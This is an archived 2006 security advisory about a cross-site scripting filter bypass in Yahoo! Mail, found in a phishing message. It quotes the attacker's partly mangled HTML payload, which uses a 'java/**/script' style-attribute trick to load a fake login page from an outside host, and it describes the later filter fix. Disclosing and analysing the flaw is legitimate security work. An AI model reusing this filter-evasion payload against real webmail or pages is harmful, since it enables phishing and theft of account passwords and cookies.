TUCoPS :: Web :: Specific Sites :: b06-1916.htm

Yahoo! Mail XSS vulnerability
Alert - Yahoo! Mail XSS vulnerability
Alert - Yahoo! Mail XSS vulnerability



Yahoo! Mail XSS vulnerability

Description:

Yahoo! Mail is a very insecure and free Web Mail
service. It allows HTML messages but it has filters to
avoid malicius script being executed on users
browsers. On 17 April 2006 I received a message that
when viewed it redirected to a fake Yahoo! Mail login
web page, I could realize about this because a strange
domain was displayed on IE status bar.
When looking at the HTML code I found out that the
message was:

 ...Message text ...

"style="background:url\(java/**/script:document.write('href="www.blabla23.com>"style="background:url\(java/**/script:document.write(' cols=100% rows=100% border=0 frameboarder=0framespacing=0>src=http://w00tynetwork.com/x/>'))">

You can see that the attacker used some tricks to bypass filters, but we can't know all the tricks the attacker used because some chars were removed or replaced by the filter. That script loaded a fake Yahoo! Mail login web page in order to steal passwords. Yahoo! was contacted and they responded that the issue was going to be fixed, after that I haven't hear any news about them. It seems that the issue was fixed because now the same message is displayed as: ...Message text ...

"style="background:url\(_java/**/script:document.write('href="www.blabla23.com>"style="background:url\(_java/**/script:document.write(' cols=100% rows=100% border=0 frameboarder=0framespacing=0>src=http://w00tynetwork.com/x/>'))">

Now filters were improved, whenever the word javascript appears a "_" is appended at the begining, and a "x" is appended at the begining of dangerous HTML tags. Again Yahoo! didn't released any advisory nor contacted customers about this issue. This issue was exploited for long time by malicious people for stealing passwords and cookies in order to compromise Yahoo! Mail users accounts, so it's very important that Yahoo! Mail users change their passwords just in case their accounts were compromised. Cesar. __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH